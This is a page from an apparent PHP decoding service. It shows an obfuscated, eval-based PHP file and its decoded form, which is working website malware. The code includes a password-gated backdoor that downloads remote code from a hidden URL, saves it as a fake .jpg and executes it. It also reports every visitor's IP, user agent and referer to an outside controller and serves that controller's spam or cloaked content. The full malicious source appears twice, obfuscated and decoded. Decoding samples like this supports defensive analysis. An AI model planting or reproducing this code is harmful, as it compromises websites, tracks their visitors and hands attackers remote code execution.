Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php /*-XiS(uR-*/error_reporting(0); /*-lg|N!^V:S-*/eval/*-.c&f!=BJ40O(mQnoK&Sf`MBYZoP~zb..

Decoded Output download

?><?php
if(strpos($_SERVER['HTTP_HOST'],'ahgtv')===false&&strpos($_SERVER['HTTP_HOST'],'beyuq')===false&&md5($_REQUEST['action']) == 'd91049513fb1d1f8ad6355b2698252cf'){
  if(file_exists('head1.jpg')){require('head1.jpg');exit();}else{
	$a = get_html(base64_decode('aHR0cDovL3dwdGVzdC53b2RpcmVjdC50b3AvcmVtb3RlL3VqaWsudHh0'));
	$a=str_replace(array('echo "[ <a href=\'?action=door123','door123'),array('echo "[ <a href=\'?action=".$_GET[\'action\']."','\'.$_GET[\'action\'].\''),$a);
    file_put_contents('head1.jpg', $a);
	if(file_exists('head1.jpg'))require('head1.jpg');else echo 'file 404';
    exit();
  }
}
$go_to ="ZzEzMy5yYWhndHYudG9w";
$skey ="a0660";
$go_to =base64_decode($go_to);
header('Content-Type: text/html; charset=utf-8');
set_time_limit(0);
error_reporting(0);
ob_clean();
ob_end_clean();
ob_start();

$lan = base64_encode(@$_SERVER['HTTP_ACCEPT_LANGUAGE']);
$uri = base64_encode(@$_SERVER['REQUEST_URI']);
$host = @$_SERVER['HTTP_HOST'];
$user_agent = base64_encode(@$_SERVER['HTTP_USER_AGENT']);
$referer = base64_encode(@$_SERVER['HTTP_REFERER']);
$ip = base64_encode(@$_SERVER['REMOTE_ADDR']);
$zone = base64_encode(date_default_timezone_get());
if(is_https()) {$http_type = "https://";} else {$http_type = "http://";}

$typeName = base64_encode($http_type.$host);
$site_url = "http://".$go_to.'/index.php?domain='.$typeName.'&uri='.$uri.'&lan='.$lan.'&agent='.$user_agent.'&zone='.$zone.'&ip='.$ip.'&skey='.$skey.'&referer='.$referer;
//echo $site_url;
$file_contents = get_html($site_url);

if(strstr($file_contents, "[#*#*#]")){
    $html = explode("[#*#*#]", $file_contents);
    if(substr(trim($html[0]),-8) == "echohtml"){ echo substr(trim($html[0]),0,-8).$html[1]; exit(); }
    if(substr(trim($html[0]),-7) == "echoxml"){ header("Content-type: text/xml"); echo substr(trim($html[0]),0,-7).$html[1]; exit(); }
    if(substr(trim($html[0]),-7) == "echorss"){ header("Content-type: text/xml"); echo substr(trim($html[0]),0,-7).$html[1]; exit(); }
    if(substr(trim($html[0]),-7) == "echokkk"){ header("X-Robots-Tag: noindex"); echo substr(trim($html[0]),0,-7).$html[1]; exit(); }
    if(substr(trim($html[0]),-7) == "echo404"){ header("HTTP/1.1 404 Not Found"); header("Status: 404 Not Found"); exit(); }
    if(substr(trim($html[0]),-7) == "pingxml"){ pingsite_map($html[1]); exit();}
}

function pingsite_map($urls){
    $maps = explode("|||", $urls);
    foreach($maps as $v){
        $pingRes = get_html($v); 
        $Oooo0s = (strpos($pingRes, 'Sitemap Notification Received') !== false||strpos($pingRes, '') !== false) ? 'OK ' : '<font color=red>ERROR </font><div style="background:#f5f5f5;padding:11px; border:1px solid #ccc;">'.$pingRes.'</div>';
        echo $v . '===>Sitemap: ' . $Oooo0s ."<br/>";
    }
}
function get_html($web_url){
    $file_contents = @file_get_contents($web_url); 
    if (!$file_contents) {
        $ch_t = curl_init();
        curl_setopt($ch_t, CURLOPT_URL, $web_url);
        curl_setopt($ch_t, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch_t, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch_t, CURLOPT_RETURNTRANSFER,1);
        $file_contents = curl_exec($ch_t);
        curl_close($ch_t);
    }  
    return $file_contents;
}  
function is_https() {
	if ( !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
		return true;
	} elseif ( isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' ) {
		return true;
	} elseif ( !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
		return true;
	}
	return false;
}
?>

Did this file decode correctly?

Original Code

<?php /*-XiS(uR-*/error_reporting(0); /*-lg|N!^V:S-*/eval/*-.c&f!=BJ40O(mQnoK&Sf`MBYZoP~zbvkcYS>-#]t%@o-*/(/*-5(7}xeQ!-*/base64_decode/*-3(YzhJ#-*/(/*-1ujAH9-[.k-*/"Pz48P3BocAppZihzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfSE9TVCddLCdhaGd0dicpPT09ZmFsc2UmJnN0cnBvcygkX1NFUlZFUlsnSFRUUF9IT1NUJ10sJ2JleXVxJyk9PT1mYWxzZSYmbWQ1KCRfUkVRVUVTVFsnYWN0aW9uJ10pID09ICdkOTEwNDk1MTNmYjFkMWY4YWQ2MzU1YjI2OTgyNTJjZicpewogIGlmKGZpbGVfZXhpc3RzKCdoZWFkMS5qcGcnKSl7cmVxdWlyZSgnaGVhZDEuanBnJyk7ZXhpdCgpO31lbHNlewoJJGEgPSBnZXRfaHRtbChiYXNlNjRfZGVjb2RlKCdhSFIwY0RvdkwzZHdkR1Z6ZEM1M2IyUnBjbVZqZEM1MGIzQXZjbVZ0YjNSbEwzVnFhV3N1ZEhoMCcpKTsKCSRhPXN0cl9yZXBsYWNlKGFycmF5KCdlY2hvICJbIDxhIGhyZWY9XCc/YWN0aW9uPWRvb3IxMjMnLCdkb29yMTIzJyksYXJyYXkoJ2VjaG8gIlsgPGEgaHJlZj1cJz9hY3Rpb249Ii4kX0dFVFtcJ2FjdGlvblwnXS4iJywnXCcuJF9HRVRbXCdhY3Rpb25cJ10uXCcnKSwkYSk7CiAgICBmaWxlX3B1dF9jb250ZW50cygnaGVhZDEuanBnJywgJGEpOwoJaWYoZmlsZV9leGlzdHMoJ2hlYWQxLmpwZycpKXJlcXVpcmUoJ2hlYWQxLmpwZycpO2Vsc2UgZWNobyAnZmlsZSA0MDQnOwogICAgZXhpdCgpOwogIH0KfQokZ29fdG8gPSJaekV6TXk1eVlXaG5kSFl1ZEc5dyI7CiRza2V5ID0iYTA2NjAiOwokZ29fdG8gPWJhc2U2NF9kZWNvZGUoJGdvX3RvKTsKaGVhZGVyKCdDb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCcpOwpzZXRfdGltZV9saW1pdCgwKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpvYl9jbGVhbigpOwpvYl9lbmRfY2xlYW4oKTsKb2Jfc3RhcnQoKTsKCiRsYW4gPSBiYXNlNjRfZW5jb2RlKEAkX1NFUlZFUlsnSFRUUF9BQ0NFUFRfTEFOR1VBR0UnXSk7CiR1cmkgPSBiYXNlNjRfZW5jb2RlKEAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7CiRob3N0ID0gQCRfU0VSVkVSWydIVFRQX0hPU1QnXTsKJHVzZXJfYWdlbnQgPSBiYXNlNjRfZW5jb2RlKEAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pOwokcmVmZXJlciA9IGJhc2U2NF9lbmNvZGUoQCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSk7CiRpcCA9IGJhc2U2NF9lbmNvZGUoQCRfU0VSVkVSWydSRU1PVEVfQUREUiddKTsKJHpvbmUgPSBiYXNlNjRfZW5jb2RlKGRhdGVfZGVmYXVsdF90aW1lem9uZV9nZXQoKSk7CmlmKGlzX2h0dHBzKCkpIHskaHR0cF90eXBlID0gImh0dHBzOi8vIjt9IGVsc2UgeyRodHRwX3R5cGUgPSAiaHR0cDovLyI7fQoKJHR5cGVOYW1lID0gYmFzZTY0X2VuY29kZSgkaHR0cF90eXBlLiRob3N0KTsKJHNpdGVfdXJsID0gImh0dHA6Ly8iLiRnb190by4nL2luZGV4LnBocD9kb21haW49Jy4kdHlwZU5hbWUuJyZ1cmk9Jy4kdXJpLicmbGFuPScuJGxhbi4nJmFnZW50PScuJHVzZXJfYWdlbnQuJyZ6b25lPScuJHpvbmUuJyZpcD0nLiRpcC4nJnNrZXk9Jy4kc2tleS4nJnJlZmVyZXI9Jy4kcmVmZXJlcjsKLy9lY2hvICRzaXRlX3VybDsKJGZpbGVfY29udGVudHMgPSBnZXRfaHRtbCgkc2l0ZV91cmwpOwoKaWYoc3Ryc3RyKCRmaWxlX2NvbnRlbnRzLCAiWyMqIyojXSIpKXsKICAgICRodG1sID0gZXhwbG9kZSgiWyMqIyojXSIsICRmaWxlX2NvbnRlbnRzKTsKICAgIGlmKHN1YnN0cih0cmltKCRodG1sWzBdKSwtOCkgPT0gImVjaG9odG1sIil7IGVjaG8gc3Vic3RyKHRyaW0oJGh0bWxbMF0pLDAsLTgpLiRodG1sWzFdOyBleGl0KCk7IH0KICAgIGlmKHN1YnN0cih0cmltKCRodG1sWzBdKSwtNykgPT0gImVjaG94bWwiKXsgaGVhZGVyKCJDb250ZW50LXR5cGU6IHRleHQveG1sIik7IGVjaG8gc3Vic3RyKHRyaW0oJGh0bWxbMF0pLDAsLTcpLiRodG1sWzFdOyBleGl0KCk7IH0KICAgIGlmKHN1YnN0cih0cmltKCRodG1sWzBdKSwtNykgPT0gImVjaG9yc3MiKXsgaGVhZGVyKCJDb250ZW50LXR5cGU6IHRleHQveG1sIik7IGVjaG8gc3Vic3RyKHRyaW0oJGh0bWxbMF0pLDAsLTcpLiRodG1sWzFdOyBleGl0KCk7IH0KICAgIGlmKHN1YnN0cih0cmltKCRodG1sWzBdKSwtNykgPT0gImVjaG9ra2siKXsgaGVhZGVyKCJYLVJvYm90cy1UYWc6IG5vaW5kZXgiKTsgZWNobyBzdWJzdHIodHJpbSgkaHRtbFswXSksMCwtNykuJGh0bWxbMV07IGV4aXQoKTsgfQogICAgaWYoc3Vic3RyKHRyaW0oJGh0bWxbMF0pLC03KSA9PSAiZWNobzQwNCIpeyBoZWFkZXIoIkhUVFAvMS4xIDQwNCBOb3QgRm91bmQiKTsgaGVhZGVyKCJTdGF0dXM6IDQwNCBOb3QgRm91bmQiKTsgZXhpdCgpOyB9CiAgICBpZihzdWJzdHIodHJpbSgkaHRtbFswXSksLTcpID09ICJwaW5neG1sIil7IHBpbmdzaXRlX21hcCgkaHRtbFsxXSk7IGV4aXQoKTt9Cn0KCmZ1bmN0aW9uIHBpbmdzaXRlX21hcCgkdXJscyl7CiAgICAkbWFwcyA9IGV4cGxvZGUoInx8fCIsICR1cmxzKTsKICAgIGZvcmVhY2goJG1hcHMgYXMgJHYpewogICAgICAgICRwaW5nUmVzID0gZ2V0X2h0bWwoJHYpOyAKICAgICAgICAkT29vbzBzID0gKHN0cnBvcygkcGluZ1JlcywgJ1NpdGVtYXAgTm90aWZpY2F0aW9uIFJlY2VpdmVkJykgIT09IGZhbHNlfHxzdHJwb3MoJHBpbmdSZXMsICfpgIHkv6HjgZXjgozjgZ/jgrXjgqTjg4jjg57jg4Pjg5fjgpLlj5fkv6HjgZfjgb7jgZfjgZ8nKSAhPT0gZmFsc2UpID8gJ09LIOaIkOWKnycgOiAnPGZvbnQgY29sb3I9cmVkPkVSUk9SIOWHuumUmeS6hjwvZm9udD48ZGl2IHN0eWxlPSJiYWNrZ3JvdW5kOiNmNWY1ZjU7cGFkZGluZzoxMXB4OyBib3JkZXI6MXB4IHNvbGlkICNjY2M7Ij4nLiRwaW5nUmVzLic8L2Rpdj4nOwogICAgICAgIGVjaG8gJHYgLiAnPT09PlNpdGVtYXA6ICcgLiAkT29vbzBzIC4iPGJyLz4iOwogICAgfQp9CmZ1bmN0aW9uIGdldF9odG1sKCR3ZWJfdXJsKXsKICAgICRmaWxlX2NvbnRlbnRzID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR3ZWJfdXJsKTsgCiAgICBpZiAoISRmaWxlX2NvbnRlbnRzKSB7CiAgICAgICAgJGNoX3QgPSBjdXJsX2luaXQoKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2hfdCwgQ1VSTE9QVF9VUkwsICR3ZWJfdXJsKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2hfdCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgMCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoX3QsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIDApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaF90LCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLDEpOwogICAgICAgICRmaWxlX2NvbnRlbnRzID0gY3VybF9leGVjKCRjaF90KTsKICAgICAgICBjdXJsX2Nsb3NlKCRjaF90KTsKICAgIH0gIAogICAgcmV0dXJuICRmaWxlX2NvbnRlbnRzOwp9ICAKZnVuY3Rpb24gaXNfaHR0cHMoKSB7CglpZiAoICFlbXB0eSgkX1NFUlZFUlsnSFRUUFMnXSkgJiYgc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUFMnXSkgIT09ICdvZmYnKSB7CgkJcmV0dXJuIHRydWU7Cgl9IGVsc2VpZiAoIGlzc2V0KCRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEX1BST1RPJ10pICYmICRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEX1BST1RPJ10gPT09ICdodHRwcycgKSB7CgkJcmV0dXJuIHRydWU7Cgl9IGVsc2VpZiAoICFlbXB0eSgkX1NFUlZFUlsnSFRUUF9GUk9OVF9FTkRfSFRUUFMnXSkgJiYgc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9GUk9OVF9FTkRfSFRUUFMnXSkgIT09ICdvZmYnKSB7CgkJcmV0dXJuIHRydWU7Cgl9CglyZXR1cm4gZmFsc2U7Cn0KPz4="/*-Ac5_f4|Q-*/)/*-)Jx:3~d>-!-*/);?>

Function Calls

base64_decode	1
error_reporting	1

Variables

None

Stats

MD5	c919f747155d7243eef21c44f0997bdf
Eval Count	1
Decode Time	66 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats